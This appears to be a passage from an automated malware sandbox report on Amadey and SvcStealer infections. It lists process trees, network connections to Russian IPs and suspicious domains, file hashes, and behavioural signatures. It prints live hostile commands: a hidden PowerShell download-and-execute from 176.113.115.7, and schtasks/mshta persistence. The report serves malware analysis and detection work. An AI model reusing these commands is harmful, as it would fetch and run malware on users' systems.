"C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"

C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe

"C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"

C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1216

C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe

"C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

"C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 852

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

"C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe

"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"

C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe

"C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE

"C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "O5x0ImaVemy" /tr "mshta \"C:\Temp\8dw7RzrvO.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\8dw7RzrvO.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\system32\taskeng.exe

taskeng.exe {0102F77C-CFAE-4625-AABC-402260BBCF85} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]

C:\ProgramData\djrq\nbiciq.exe

C:\ProgramData\djrq\nbiciq.exe

C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe

"C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

Network

Country Destination Domain Proto
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 104.21.31.208:443 explorebieology.run tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
US 8.8.8.8:53 codxefusion.top udp
US 172.67.212.102:443 codxefusion.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 104.21.68.89:443 biochextryhub.bet tcp
N/A 127.0.0.1:49647 tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 drunkeflavorz.pw udp
US 104.21.31.208:443 explorebieology.run tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp

Files

C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta

MD5 42bcecbc4a9d0c9e72120f0a60102147
SHA1 026d375bc2a684027fb8532af83ce2991509e1f1
SHA256 303332f5d6160d3604c26f26245225fcdb46887b69f741b346b35948cbb1b23b
SHA512 d6438e784658959e18c3b867bac7e406131011dc5146db4ce9781469e4cabee4630dd6b79106b7b507fe03e748a51516855dcae59f4ac0b2ab29416f339c4498

\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE

MD5 3147e388f1f2ad94f26aee55a4267b8c
SHA1 b3dfd5bb152b1b8e338586ea1e2d240cde6503b3
SHA256 49ac9312c49ff99d5af392d17450747038fcbd6f319ebf981916fcf44120aa2b
SHA512 720b48b08c502c153ecdaeb6fa8a2e374187a71655a88493dc70b266fe16ce88d342aaceefbe5a35fa9db93911510baee7fb578786e44ae6da637369f56443e9

memory/2780-15-0x0000000000CC0000-0x000000000115F000-memory.dmp

memory/1864-14-0x00000000064C0000-0x000000000695F000-memory.dmp

memory/1864-12-0x00000000064C0000-0x000000000695F000-memory.dmp

memory/1936-32-0x0000000000F00000-0x000000000139F000-memory.dmp

memory/2780-31-0x0000000006D40000-0x00000000071DF000-memory.dmp

memory/2780-29-0x0000000000CC0000-0x000000000115F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/2936-50-0x00000000011D0000-0x0000000001230000-memory.dmp

memory/2460-69-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2460-70-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-68-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-65-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-59-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-57-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-53-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-63-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-61-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-55-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-72-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1936-76-0x0000000000F00000-0x000000000139F000-memory.dmp

memory/1936-77-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe

MD5 9dadf2f796cd4500647ab74f072fd519
SHA1 92b6c95a6ed1e120488bd28ac74274e874f6e740
SHA256 e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76
SHA512 fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d

memory/1936-93-0x0000000006A00000-0x0000000006EAC000-memory.dmp

memory/1936-94-0x0000000006A00000-0x0000000006EAC000-memory.dmp

memory/2196-95-0x0000000000260000-0x000000000070C000-memory.dmp

memory/1936-124-0x0000000000F00000-0x000000000139F000-memory.dmp

memory/1936-125-0x0000000006A00000-0x0000000006EAC000-memory.dmp

memory/1936-126-0x0000000006A00000-0x0000000006EAC000-memory.dmp

memory/2196-127-0x0000000000260000-0x000000000070C000-memory.dmp

memory/2196-129-0x0000000000260000-0x000000000070C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe

MD5 001d7acad697c62d8a2bd742c4955c26
SHA1 840216756261f1369511b1fd112576b3543508f7
SHA256 de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af
SHA512 f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb

\Windows\Temp\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe

MD5 eff9e9d84badf4b9d4c73155d743b756
SHA1 fd0ad0c927617a3f7b7e1df2f5726259034586af
SHA256 d61ef1bfa73bd5b013066d86f1c41e33bb396fc547cf5ab7191f56cc7b463aad
SHA512 0006273c86e8130e06e705a2be46c3433c0d1b34463123354c1857ebf88503d6e7e90602dc40960351baa03155074f8c5834b251be9da90fd95b10e498a98a19

memory/1936-153-0x0000000000F00000-0x000000000139F000-memory.dmp

\Windows\Temp\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\Quadrisyllable.dll

MD5 a1e561bc201a14277dfc3bf20d1a6cd7
SHA1 1895fd97fb75ad6b59fc6d2222cf36b7dc608b29
SHA256 7ae39cb5cd14a875af3e43df4a309d6a7a44c0339c413bf21b0300c84e35b66c
SHA512 aaa4e7350094dc7574e5f18ce619f48a45062674353f0f2a340a1fea0055c7961a9b257455d8ea877d739635e3444df08f049484f48fa9729d8fb1667374cf3c

\Windows\Temp\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe

MD5 1f166f5c76eb155d44dd1bf160f37a6a
SHA1 cd6f7aa931d3193023f2e23a1f2716516ca3708c
SHA256 2d13424b09ba004135a26ccd60b64cdd6917d80ce43070cbc114569eae608588
SHA512 38ad8f1308fe1aae3ddf7dbc3b1c5442663571137390b3e31e2527b8fec70e7266b06df295df0c411fcc500424022f274fd467d36040def2e1a4feff88c749b7

memory/1864-176-0x0000000000400000-0x0000000000D48000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

MD5 30c1a6337089e68b975438caebc8f497
SHA1 2cf2324672cf72b9bc1869633f3bf6904bb61011
SHA256 db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017
SHA512 be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484

memory/1936-191-0x00000000063E0000-0x00000000066F1000-memory.dmp

memory/1952-194-0x00000000000F0000-0x0000000000401000-memory.dmp

memory/1936-192-0x00000000063E0000-0x00000000066F1000-memory.dmp

memory/1936-197-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/1936-217-0x00000000063E0000-0x00000000066F1000-memory.dmp

memory/1936-218-0x00000000063E0000-0x00000000066F1000-memory.dmp

memory/1952-219-0x00000000000F0000-0x0000000000401000-memory.dmp

memory/1936-220-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarAF0B.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/1936-362-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe

MD5 7ff72f21d83d3abdc706781fb3224111
SHA1 3bfbe059b8e491bde4919fb29afa84d4ea1c0fa8
SHA256 0c54843666a464f185c97a7693a91eb328827a900717e414357b897bd2630fea
SHA512 dbb3c7b618bc2c80dae90ff902100d3902ddffe5705cf0c648b8b3f702fd8814b9cf66490e3260e09d36c1ce57bfc05d3f9bb0fc089c5ec7c553eb8a94d3320d

memory/1936-376-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe

MD5 971c0e70de5bb3de0c9911cf96d11743
SHA1 43badfc19a7e07671817cf05b39bc28a6c22e122
SHA256 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d
SHA512 a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

memory/2808-388-0x000000013FC30000-0x000000013FDDE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/1936-404-0x0000000006A00000-0x0000000006E9B000-memory.dmp

memory/1936-403-0x0000000006A00000-0x0000000006E9B000-memory.dmp

memory/2824-406-0x00000000010F0000-0x000000000158B000-memory.dmp

memory/1936-411-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe

MD5 3babce4f85902c7bcfde22e222508c4e
SHA1 4898ae5c075322b47ab2f512b5463ee6116d98f7
SHA256 06b678b55cb81e6999b25903def2ac02336dc6c9ff3cd6afdaafffd55e2e5302
SHA512 f8687729c8931579f8120f6451f669726f115123c10a7c5ce6d9a24746940153efcf7e33b719e8f543f9b4316db485633272943f462bf948b4044f234795d629

memory/2824-424-0x00000000010F0000-0x000000000158B000-memory.dmp

memory/1936-425-0x0000000006A00000-0x0000000006E9B000-memory.dmp

memory/1936-426-0x0000000006A00000-0x0000000006E9B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

MD5 19668940080169c70b830bed8c390783
SHA1 5e6b72e52abc7d221d512111e39cbdd3f2ad40c1
SHA256 cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c
SHA512 c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2

memory/880-440-0x000000013F390000-0x000000013F42F000-memory.dmp

memory/1936-439-0x0000000005400000-0x000000000549F000-memory.dmp

memory/1936-438-0x0000000005400000-0x000000000549F000-memory.dmp

memory/1208-441-0x0000000003E30000-0x0000000003ED5000-memory.dmp

memory/1208-443-0x0000000003E30000-0x0000000003ED5000-memory.dmp

memory/1208-447-0x0000000003E30000-0x0000000003ED5000-memory.dmp

memory/880-446-0x000000013F390000-0x000000013F42F000-memory.dmp

memory/1936-448-0x0000000000F00000-0x000000000139F000-memory.dmp

memory/1936-449-0x0000000005400000-0x000000000549F000-memory.dmp

memory/1936-450-0x0000000005400000-0x000000000549F000-memory.dmp

memory/1580-452-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1936-453-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

MD5 e82c4c3f7a2994eeecc1f81a5e4a4180
SHA1 660820f778073332dcd5ec446d2fcf00de887abd
SHA256 11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3
SHA512 4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

MD5 02579a797e919dcaf5758fbcbe34b093
SHA1 7668fff0888f4c7ad7a83b24f8c6d4009c10e534
SHA256 0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c
SHA512 2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5

memory/1936-554-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

MD5 f53198e8b444658cf7134f5ccb466a98
SHA1 0283e56ed7201eecfc7dad30cc6f3f30d677be66
SHA256 936004bbb9d3c4763c0e36cc887b21315ae6c2d55c366cb3b3390d480b827107
SHA512 ee40f63f7b75cc1b55d11c56c25086d2d66ae86a3f65326d5a75cf0f2fac94ebee622cd4844b4f6468b2bfd011ab80558f41e1b62d2a7864b0ce7f61d3bdcf09

memory/2300-567-0x00000000041E0000-0x0000000004603000-memory.dmp

memory/2372-569-0x0000000000400000-0x0000000000823000-memory.dmp

memory/2300-568-0x00000000041E0000-0x0000000004603000-memory.dmp

memory/2336-572-0x0000000000170000-0x00000000001D5000-memory.dmp

memory/1936-577-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/1936-590-0x0000000006A00000-0x00000000070EE000-memory.dmp

memory/1936-591-0x0000000006A00000-0x00000000070EE000-memory.dmp

memory/1824-592-0x0000000000970000-0x000000000105E000-memory.dmp

memory/2300-593-0x00000000041E0000-0x0000000004603000-memory.dmp

memory/2300-594-0x00000000041E0000-0x0000000004603000-memory.dmp

memory/2372-595-0x0000000000400000-0x0000000000823000-memory.dmp

memory/2372-596-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

MD5 22892b8303fa56f4b584a04c09d508d8
SHA1 e1d65daaf338663006014f7d86eea5aebf142134
SHA256 87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f
SHA512 852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

memory/1936-614-0x0000000000F00000-0x000000000139F000-memory.dmp

memory/1824-615-0x0000000000970000-0x000000000105E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe

MD5 da3a7687a7f215bbbc93fe62e0afa1ea
SHA1 ee56166cf511655e53b4bbd796247c9810037476
SHA256 231b4d3c2b060b288878d7c28fb536c22f3844a54bf003eaf3b0da4808ffd63d
SHA512 374c8ecdfbd339f0064c9c799ff428086e49e82c053ddcb25b3a84c850ad6c1fa009f8833804330e8c16c489088496dbbdc74f6ee6970be4f0e2e996ed2cd75a

memory/1696-744-0x0000000001170000-0x000000000160F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/2372-759-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YYMSUYSSQ3CAKYLT6H5V.temp

MD5 29c618e15d21bc79ac7d3b3af1291cef
SHA1 372437f7e7ffa08dc419ec8caef214063e257107
SHA256 1562cc7e2bb4afa829250ff827198b5490f32ea8da9264a08c8e38fe66ce9e45
SHA512 26450f65deed7c371c78c4864b7f4571e8f354c258469c2a8cd6c107e5a5dd8f1e0d06bbf1cb3b6af616d8efb8fe7efac479ec5204d68a26da9fa91526a740ef

memory/1936-831-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe

MD5 77c8daa35f8fa536031bca64e567107b
SHA1 0524411a8f30adf2b1d95c071eaa4ff900c9b702
SHA256 d0c87ac8cb00fd5d5aedbdeb6c747327969ae5ba1d031b902697ac5a9aa5fb02
SHA512 dbcc132580a51abc93a36cf1303a5139937a3e556902c28f516185d940b7a49217f4dd50ccad92a763b5e1e9563b963bed2d713fb45497c56f93bba59cb0bedd

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 03:56

Reported

2025-03-05 03:57

Platform

win10v2004-20250217-en

Max time kernel

34s

Max time network

46s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A

Identifies Wine through registry keys

defense_evasion
